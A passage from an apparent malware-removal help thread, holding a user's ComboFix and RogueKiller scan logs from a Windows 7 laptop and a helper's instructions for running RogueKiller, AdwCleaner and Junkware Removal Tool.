2014-10-31 19:58 . 2014-04-12 06:42 129752 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-30 11:25 . 2010-11-21 03:27 275080 ------w- c:\windows\system32\MpSigStub.exe
2014-10-15 06:54 . 2014-05-09 21:11 103265616 ----a-w- c:\windows\system32\MRT.exe
2014-10-01 15:11 . 2014-04-12 06:42 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-10-01 15:11 . 2014-04-12 06:42 93400 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-10-01 15:11 . 2014-04-12 06:42 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-09-25 02:08 . 2014-09-30 21:47 371712 ----a-w- c:\windows\system32\qdvd.dll
2014-09-25 01:40 . 2014-09-30 21:47 519680 ----a-w- c:\windows\SysWow64\qdvd.dll
2014-09-24 00:49 . 2012-01-02 09:18 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-24 00:49 . 2012-01-02 09:18 701104 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-09-16 21:25 . 2014-04-20 18:20 1188440 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
2014-09-09 22:11 . 2014-09-23 20:28 2048 ----a-w- c:\windows\system32\tzres.dll
2014-09-09 21:47 . 2014-09-23 20:28 2048 ----a-w- c:\windows\SysWow64\tzres.dll
2014-08-28 21:28 . 2011-03-29 01:36 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-23 02:07 . 2014-08-27 18:26 404480 ----a-w- c:\windows\system32\gdi32.dll
2014-08-23 01:45 . 2014-08-27 18:26 311808 ----a-w- c:\windows\SysWow64\gdi32.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ANT Agent"="c:\program files (x86)\Garmin\ANT Agent\ANT Agent.exe" [2013-02-15 14731776]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"USB3MON"="c:\program files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe" [2012-02-26 291608]
"OSD Utility"="c:\program files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe" [2012-04-27 7892992]
"Adobe Reader Speed Launcher"="c:\program files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe" [2014-09-04 40336]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-13 43848]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2014-08-21 959176]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe" [2014-09-26 271744]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
"AppInit_DLLs"=c:\windows\SysWOW64\nvinit.dll
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner.sys]
@="Driver"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R3 ESETOlmarikOlmascoCleaner;ESET Olmarik/Olmasco Cleaner;c:\windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys;c:\windows\SYSNATIVE\Drivers\ESETOlmarikOlmascoCleaner.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 libusb0;libusb-win32 - Kernel Driver 04/08/2011 1.2.4.0;c:\windows\system32\DRIVERS\libusb0.sys;c:\windows\SYSNATIVE\DRIVERS\libusb0.sys [x]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam64.sys;c:\windows\SYSNATIVE\DRIVERS\wdcsam64.sys [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 iusb3hcs;Intel(R) USB 3.0 Host Controller Switch Driver;c:\windows\system32\drivers\iusb3hcs.sys;c:\windows\SYSNATIVE\drivers\iusb3hcs.sys [x]
S0 nvpciflt;nvpciflt;c:\windows\system32\DRIVERS\nvpciflt.sys;c:\windows\SYSNATIVE\DRIVERS\nvpciflt.sys [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 ekrn;ESET Service;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [x]
S2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface;c:\program files\Intel\iCLS Client\HeciServer.exe;c:\program files\Intel\iCLS Client\HeciServer.exe [x]
S2 Intel(R) ME Service;Intel(R) ME Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [x]
S2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [x]
S2 nlsX86cc;Nalpeiron Licensing Service;c:\windows\SysWOW64\nlssrv32.exe;c:\windows\SysWOW64\nlssrv32.exe [x]
S2 SSPORT;SSPORT;c:\windows\system32\Drivers\SSPORT.sys;c:\windows\SYSNATIVE\Drivers\SSPORT.sys [x]
S2 UNS;Intel(R) Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
S3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
S3 btath_avdt;Atheros Bluetooth AVDT Service;c:\windows\system32\drivers\btath_avdt.sys;c:\windows\SYSNATIVE\drivers\btath_avdt.sys [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
S3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
S3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
S3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
S3 CirrusLFD;CS42xxLowerFilter;c:\windows\system32\DRIVERS\CSLFDx64.sys;c:\windows\SYSNATIVE\DRIVERS\CSLFDx64.sys [x]
S3 iusb3hub;Intel(R) USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\iusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3hub.sys [x]
S3 iusb3xhc;Intel(R) USB 3.0 eXtensible Host Controller Driver;c:\windows\system32\DRIVERS\iusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3xhc.sys [x]
S3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\System32\Drivers\RtsUStor.sys;c:\windows\SYSNATIVE\Drivers\RtsUStor.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
S3 ViWDM;USB Filter Driver;c:\windows\system32\DRIVERS\ViWDM.SYS;c:\windows\SYSNATIVE\DRIVERS\ViWDM.SYS [x]
S3 vrvd5;vrvd5;c:\windows\system32\DRIVERS\vrvd5.sys;c:\windows\SYSNATIVE\DRIVERS\vrvd5.sys [x]
.
.
Contents of the 'Scheduled Tasks' folder
.
2014-11-03 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-01-02 00:50]
.
2014-11-02 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
- c:\users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27 19:17]
.
2014-11-03 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
- c:\users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27 19:17]
.
2012-01-01 c:\windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job
- c:\program files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-27 03:24]
.
2012-01-01 c:\windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job
- c:\program files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-27 03:24]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FspUip"="c:\program files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe" [2012-05-01 5406104]
"SRS Premium Sound HD"="c:\program files\SRS Labs\SRS Control Panel\SRSPanel_64.exe" [2012-05-10 2170752]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2012-05-15 170264]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2012-05-15 398616]
"Persistence"="c:\windows\system32\igfxpers.exe" [2012-05-15 440088]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2012-02-13 1020064]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2012-02-13 800416]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2014-08-22 1331288]
"CDAServer"="c:\program files\Common Files\Common Desktop Agent\CDASrv.exe" [2012-03-09 462712]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=c:\windows\System32\nvinitx.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = hxxp://www.bing.com/
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~2\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~2\MICROS~2\Office14\ONBttnIE.dll/105
TCP: DhcpNameServer = 192.168.200.1
.
- - - - ORPHANS REMOVED - - - -
.
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_167_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_167_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.15"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_167.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VideoLAN.VLCPlugin.*1*]
@="?????????????????? v1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VideoLAN.VLCPlugin.*1*\CLSID]
@="{E23FE9C6-778E-49D4-B537-38FCDE4887D8}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VideoLAN.VLCPlugin.*2*]
@="?????????????????? v2"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VideoLAN.VLCPlugin.*2*\CLSID]
@="{9BE31822-FDAD-461B-AD51-BE1D1C159921}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-11-03 15:20:25
ComboFix-quarantined-files.txt 2014-11-03 20:20
.
Pre-Run: 891,830,935,552 bytes free
Post-Run: 891,910,053,888 bytes free
.
- - End Of File - - 8292DE2ED1738E0AB4908841DA4909F5
After running these tools, for now I'm not seeing any of the duplicate processes running in the task manager. I've posted the logs below.
Phew!
Let's run a couple scans to see if anything else is hiding.
Please download RogueKiller and save it to your desktop.
You can check here (http://support.microsoft.com/kb/827218) if you're not sure if your computer is 32-bit or 64-bit
Download RogueKiller (http://www.sur-la-toile.com/RogueKiller/RogueKiller.exe) to your desktop.
Quit all running programs.
For Windows XP, double-click to start.
For Vista, Windows 7/8, right-click on the program and select Run as Administrator to start, and when prompted allow it to run.
Read and accept the EULA (End User License Agreement).
Click Scan to scan the system.
When the scan completes, close the program. Don't fix anything!
Don't run any other options, they're not all bad!!
Post back the report which should be located on your desktop.
~~~~~~~~~~~~~~~~~~~~~
-AdwCleaner-by Xplode
Click on this link to download : ADWCleaner (http://www.bleepingcomputer.com/download/adwcleaner/)
Click on ONE of the two blue Download Now buttons that have a blue arrow beside them and save it to your desktop.
Do not click on any links in the top advertisement.
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click on Scan.
After the scan is complete click on "Clean"
Confirm each time with Ok.
Your computer will be rebooted automatically. A text file will open after the restart.
Please post the content of that logfile with your next answer.
You can find the logfile at C:\AdwCleaner[S1].txt as well.
NOTE: If you see AVG Secure Search being targeted for deletion, Here's Why (http://www.im-infected.com/hijacker/isearch-avg-comsearch-hijacker.html) and Here (http://nojesusnopeas.blogspot.com/2012/08/sorry-but-avg-secure-search-is-malware.html). You can always Reinstall (http://www.avg.com/us-en/secure-search) it.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Please download Junkware Removal Tool (http://www.bleepingcomputer.com/download/junkware-removal-tool/) to your desktop.
Shut down your protection software now to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.
~~~
please post
RogueKiller
C:\AdwCleaner.txt
JRT.txt
ascot1340
2014-11-04, 01:42
RogueKiller V10.0.4.0 [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Ryan [Administrator]
Mode : Scan -- Date : 11/03/2014 18:18:39
¤¤¤ Processes : 0 ¤¤¤
¤¤¤ Registry : 21 ¤¤¤
[PUM.HomePage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.HomePage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.bing.com/ -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.bing.com/ -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.bing.com/ -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.bing.com/ -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found
[PUM.SearchPage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{81D07DDC-4245-4ED1-AB63-209670737883} | DhcpNameServer : 10.14.0.1 [(Private Address) (XX)] -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{81D07DDC-4245-4ED1-AB63-209670737883} | DhcpNameServer : 10.14.0.1 [(Private Address) (XX)] -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{81D07DDC-4245-4ED1-AB63-209670737883} | DhcpNameServer : 10.14.0.1 [(Private Address) (XX)] -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found
¤¤¤ Tasks : 0 ¤¤¤
¤¤¤ Files : 0 ¤¤¤
¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost
¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤
¤¤¤ Web browsers : 0 ¤¤¤
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] 9426ba02345292a0bee50c7b41104940
[BSP] 3e8d433fc34d5ce61be57210180c8fe4 : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] ACER (0x27) [VISIBLE] Offset (sectors): 2048 | Size: 600 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1230848 | Size: 941267 MB
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 1928945664 | Size: 12000 MB
User = LL1 ... OK
User = LL2 ... OK
# AdwCleaner v3.311 - Report created 03/11/2014 at 18:22:51
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Ryan - RYAN-PC
